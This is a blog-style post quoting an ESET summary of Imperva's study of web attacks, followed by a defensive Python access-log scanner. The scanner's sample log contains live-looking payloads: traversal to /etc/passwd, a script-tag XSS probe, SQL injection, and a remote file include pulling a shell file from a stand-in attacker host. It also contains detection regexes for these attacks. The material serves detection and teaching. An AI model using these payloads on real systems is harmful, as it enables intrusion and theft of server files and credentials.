ESET offers an excellent analysis of how websites are attacked by hackers.
WebSite Security – Approaches used by hackers
QUOTE: Well, really there are far more, but the latest study from Imperva of 10 million attacks against 30 large organizations from January to May of 2011 cites a cocktail of techniques used by would-be hackers to spot the weaknesses and exploit them. For those of us who’ve tailed a log file spinning out of control during an attack attempt, those numbers seem plausible. Over time, attacks have become slick and automated, often progressive, and adaptive, targeting the next phase based on what was found in the last.
To understand a typical hack attempt, visualize a typical commercial office space break-in. There may first be a surveillance phase. Following that is a second phase that determines which doors are locked. Then, if an unlocked door is found near a machine shop, you may adapt your attack to include a truck to haul heavy equipment out during the theft. On the other hand, if you find a door open by an accounting office, you may adapt your attack to use a single backpack to steal an equivalent value. Attacks of the variety we’re talking about here follow progressive stages of discovery, adapting as they go to the “terrain” they find in a similar manner, and using different sets of tools for each.
Some of the more popular styles found in Imperva’s study against Web applications were directory traversal (37%), cross-site scripting (36%), SQL injection (23%), and remote file include (4%), aka RFI. Often these were used in combination.
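The four attack classes the study names all leave recognisable traces in a web server's access log, which is where the "tailed a log file" observation above comes from. The script below is an added illustration, not code from ESET, Imperva or the quoted post: it parses a handful of constructed access-log lines (sample data, not from the study), percent-decodes each request target so double-encoded payloads are seen in plain form, and counts requests matching simple signatures for directory traversal, cross-site scripting, SQL injection and RFI. The signatures are deliberately small heuristics chosen for this example and would need tuning against real traffic.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines for illustration only (not from the page or Imperva's data).
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2011:14:02:11 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512
203.0.113.7 - - [10/May/2011:14:02:12 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048
198.51.100.9 - - [10/May/2011:14:03:01 +0000] "GET /product?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0
198.51.100.9 - - [10/May/2011:14:03:05 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 128
192.0.2.4 - - [10/May/2011:14:04:00 +0000] "GET /about HTTP/1.1" 200 1024
192.0.2.4 - - [10/May/2011:14:04:02 +0000] "GET /files?name=%252e%252e%252fconfig.php HTTP/1.1" 404 0
"""

# Extracts the request target from a common-log-format line.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Heuristic signatures (assumed for this example), one per attack class named in the study.
SIGNATURES = {
    "directory_traversal": re.compile(r"\.\.[/\\]"),
    "xss": re.compile(r"<\s*script\b|javascript:|\bon(load|error|click|mouseover)\s*=", re.I),
    "sqli": re.compile(r"'\s*(or|and)\s+'?\w|\bunion\s+select\b|\bor\s+1\s*=\s*1\b", re.I),
    "rfi": re.compile(r"[?&]\w+=(https?|ftp)://", re.I),
}


def fully_decode(target, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%252e -> %2e -> .) are seen in plain form."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_request(target):
    """Return the sorted list of attack classes whose signature matches the decoded request target."""
    decoded = fully_decode(target)
    return sorted(name for name, pattern in SIGNATURES.items() if pattern.search(decoded))


def scan_log(log_text):
    """Count attack classes across an access log; 'flagged' counts lines matching at least one class."""
    counts = Counter()
    for line in log_text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue  # skip lines that are not well-formed request records
        labels = classify_request(match.group("target"))
        if labels:
            counts["flagged"] += 1
        counts.update(labels)
    return counts


if __name__ == "__main__":
    for name, count in sorted(scan_log(SAMPLE_LOG).items()):
        print(f"{name}: {count}")
```

Decoding before matching matters: the last sample line hides a traversal sequence behind double percent-encoding, and a matcher run on the raw line would miss it. The "flagged" count is the figure to watch over time; a sudden rise in flagged lines from a single source address is the automated, progressive scanning the quoted post describes.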